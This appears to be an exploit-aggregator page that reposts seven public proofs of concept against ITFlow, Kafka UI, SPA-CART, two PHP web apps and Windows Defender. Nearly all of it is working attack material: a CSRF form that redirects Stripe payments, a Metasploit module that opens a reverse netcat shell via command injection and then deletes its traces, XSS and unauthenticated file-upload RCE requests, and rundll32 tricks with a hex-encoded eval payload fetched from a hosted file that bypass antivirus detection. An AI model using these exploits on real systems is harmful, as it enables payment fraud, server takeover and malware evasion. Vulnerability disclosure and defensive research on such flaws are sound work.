Latest exploits :: CodePwn

<pre><code># CVE: CVE-2024-25344 # CWE: CWE-352 # Vendor: ITFlow.org # Affected product: ITFlow - Before commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378 # Discoverer: stehled, WP-Pomoc.cz # Attack-Type: Remote # AV: Admin user has to open a page, provided by an attacker, which will then perform malicious request changing system settings. Open source ITFlow was vulnerable to CSRF prior commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378 This vulnerability allowed an attacker to change system settings such as online payment information and Microsoft Azure SSO credentials. If admin user is logged in, we can, using provided PoC redirect him to post.php endpoint and make changes to the system. PoC below makes changes to Stripe related settings, which will lead to attacker receiving payments made through the system. <html> <form enctype="multipart/form-data" method="POST" action="https://demo.itflow.org/post.php"> <table> <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr> <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr> <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr> <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr> <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr> </table> <input type="submit" value="https://demo.itflow.org/post.php"> </form> </html> # Reference https://itflow.org/ https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378 https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46 </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.', 'Description' => %q{ A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter at the `topic` section. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor 'BobTheShopLifter and Thingstad', # Discovery of the vulnerability CVE-2023-52251 ], 'References' => [ ['CVE', '2023-52251'], ['URL', 'https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251'], ['URL', 'https://github.com/BobTheShoplifter/CVE-2023-52251-POC'] ], 'DisclosureDate' => '2023-09-27', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], 'Privileged' => false, 'Targets' => [ [ 'Unix/Linux Command', { 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Type' => :unix_cmd, 'Payload' => { 'Encoder' => 'cmd/base64', 'BadChars' => "\x00" }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8080, 'SSL' => false }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end def vuln_version? @version = '' res = send_request_cgi({ 'method' => 'GET', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'actuator', 'info') }) if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git')) res_json = res.get_json_document unless res_json.blank? if res.body.include?('build') @version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x elsif res.body.include?('git') # use case where only the git commit id gets returned without the version information # determine version using the git commit id to match the first 7 chars of the sha commit stored in data/kafka_ui_versions.json file. git_commit_id = res_json['git']['commit']['id'] kafka_ui_versions_json = JSON.parse(File.read(::File.join(Msf::Config.data_directory, 'kafka_ui_versions.json'), mode: 'rb')) unless kafka_ui_versions_json.blank? # loop thru the list of commits and return the version based a match on the first 7 chars of the sha commit else return nil kafka_ui_versions_json.each do |tag| if tag['commit']['sha'][0, 7] == git_commit_id @version = tag['name'].delete_prefix('v') break end end end end end return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/) end false end def get_cluster res = send_request_cgi({ 'method' => 'GET', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'api', 'clusters') }) if res && res.code == 200 && res.body.include?('status') res_json = res.get_json_document unless res_json.blank? # loop thru list of clusters and return an active cluster with topic count > 0 else return nil res_json.each do |cluster| if cluster['status'] == 'online' || cluster['topicCount'] > 0 return cluster['name'] end end end end nil end def create_topic(cluster) topic_name = Rex::Text.rand_text_alphanumeric(4..10) post_data = { name: topic_name.to_s, partitions: 1, replicationFactor: 1, configs: { 'cleanup.policy': 'delete', 'retention.bytes': '-1' } }.to_json res = send_request_cgi({ 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics'), 'data' => post_data.to_s }) if res && res.code == 200 && res.body.include?(topic_name.to_s) res_json = res.get_json_document unless res_json.blank? return res_json['name'] end end nil end def delete_topic(cluster, topic) res = send_request_cgi({ 'method' => 'DELETE', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s) }) return true if res && res.code == 200 false end def produce_message(cluster, topic) # Create a dummy message to trigger the groovy script execution post_data = { partition: 0, key: 'null', content: 'null', keySerde: 'String', valueSerde: 'String' }.to_json res = send_request_cgi({ 'method' => 'POST', 'ctype' => 'application/json', 'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s, 'messages'), 'data' => post_data.to_s }) return true if res && res.code == 200 false end def execute_command(cmd, _opts = {}) payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"#{cmd}\").redirectErrorStream(true).start()" return send_request_cgi({ 'method' => 'GET', 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'api', 'clusters', @cluster.to_s, 'topics', @new_topic.to_s, 'messages'), 'vars_get' => { 'q' => payload.to_s, 'filterQueryType' => 'GROOVY_SCRIPT', 'attempt' => 2, 'limit' => 100, 'page' => 0, 'seekDirection' => 'FORWARD', 'keySerde' => 'String', 'valueSerde' => 'String', 'seekType' => 'BEGINNING' } }) end def check vprint_status("Checking if #{peer} can be exploited.") return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version? unless @version.blank? if @version.match(/\d\.\d\.\d/) return CheckCode::Safe("Kafka-ui version: #{@version}") else return CheckCode::Detected("Kafka-ui unknown version: #{@version}") end end CheckCode::Safe end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") vprint_status('Searching for active Kafka cluster...') @cluster = get_cluster fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil? vprint_good("Active Kafka cluster found: #{@cluster}") vprint_status('Creating a new topic...') @new_topic = create_topic(@cluster) fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil? vprint_good("New topic created: #{@new_topic}") vprint_status('Trigger Groovy script payload execution by creating a message...') fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic) case target['Type'] when :unix_cmd execute_command(payload.encoded) end # cleaning up the mess and remove new created topic vprint_status('Removing tracks...') if delete_topic(@cluster, @new_topic) vprint_good("Successfully deleted topic #{@new_topic}.") else print_error("Could not delete topic #{@new_topic}. Manually cleaning required.") end end end </code></pre>

<pre><code># Exploit Title: SPA-CART CMS - Stored XSS # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SPA-Cart # Vendor Homepage: https://spa-cart.com/ # Software Link: https://demo.spa-cart.com/ # Version: [1.9.0.3] # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: descr # Proof of Concept: demo.spa-cart.com/product/258 # HTTP Request: POST ////admin/products/258 HTTP/2 Host: demo.spa-cart.com Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx Content-Length: 1906 Sec-Ch-Ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Sec-Ch-Ua-Platform: "" Origin: https://demo.spa-cart.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.spa-cart.com////admin/products/258 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="mode" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="sku" SKU386 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="name" asdf ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="cleanurl" Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="avail" 1000 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="price" 0.00 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="list_price" 2 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="weight" 0.00 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="categoryid" 42 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="categories[]" 8 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="categories[]" 37 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="brandid" 4 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="keywords" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="descr" <script>alert(1)</script> ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="title_tag" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="meta_keywords" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl Content-Disposition: form-data; name="meta_description" ------WebKitFormBoundaryUsO8JxBs6LhB8LSl-- </code></pre>

<pre><code># Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated) # Google Dork: N/A # Application: Petrol pump management software # Date: 20.02.2024 # Bugs: File Upload Remote Code Execution (RCE) (unauthenticated) # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: 1.0 # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder. This allows malicious individuals to execute unauthorized commands on the system. ## Staus: HIGH-CRITICAL Vulnerability ## Proof of Concept (PoC): Video: https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view // File upload Request POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085 Origin: http://localhost Connection: close Referer: http://localhost/zer/fuelflow/admin/web.php Cookie: PHPSESSID=1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="id" 1 -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="old_photo1_img" test.png -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="photo1"; filename="3.php" Content-Type: image/png <?php phpinfo();?> -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="title" FuelFlow lite - Developed by Mayuri K. tessss -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="old_photos_img" test.png -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="photos"; filename="" Content-Type: application/octet-stream -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="sitekey" test -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="secretkey" test -----------------------------82750242321210078514140255085 Content-Disposition: form-data; name="update" -----------------------------82750242321210078514140255085-- // Phpinfo file locaton /zerday/fuelflow/assets/images/65d45a6080eca.php </code></pre>

<pre><code># Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload # Google Dork: N/A # Exploit Author: SoSPiro # Date: 2024-02-18 # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/tourism-management-system-free-download/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Allows admin to upload all files to the web server # CVE : N/A # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. # PoC request POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201 Content-Length: 361 Origin: http://localhost Connection: close Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1 Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 X-PwnFox-Color: red -----------------------------390927495111779706051786831201 Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php" Content-Type: text/plain <?php phpinfo();?> -----------------------------390927495111779706051786831201 Content-Disposition: form-data; name="submit" -----------------------------390927495111779706051786831201-- =========================================================================================== - Response - HTTP/1.1 200 OK Date: Sun, 18 Feb 2024 04:33:37 GMT Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev X-Powered-By: PHP/8.1.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8146 ============================================================================================ - File location - http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php </code></pre>

<pre><code>[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Detection Mitigation Bypass Backdoor:JS/Relvelshe.A [CVE Reference] N/A [Security Issue] Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated. However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post. [References] https://twitter.com/hyp3rlinx/status/1480657623947091968 [Exploit/POC] 1) python -m http.server 80 2) Open command prompt as Administrator 3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp") Create file and host on server, this is contents of the "yo.tmp" file. <?xml version="1.0"?> <component> <script> try{ <![CDATA[ var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } eval(str) ]]> }catch(e){ eval(str) } </script> </component> [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: February 18, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx </code></pre>

<pre><code>[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender VBScript Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine. Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with an "Access is denied" message. Trojan:Win32/Powessere.G Category: Trojan This program is dangerous and executes commands from an attacker. However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection. Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing. E.g. C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) [References] https://twitter.com/hyp3rlinx/status/1759260962761150468 https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ [Exploit/POC] Open command prompt as Administrator C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) Access is denied. C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) We win! [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: February 18, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx </code></pre>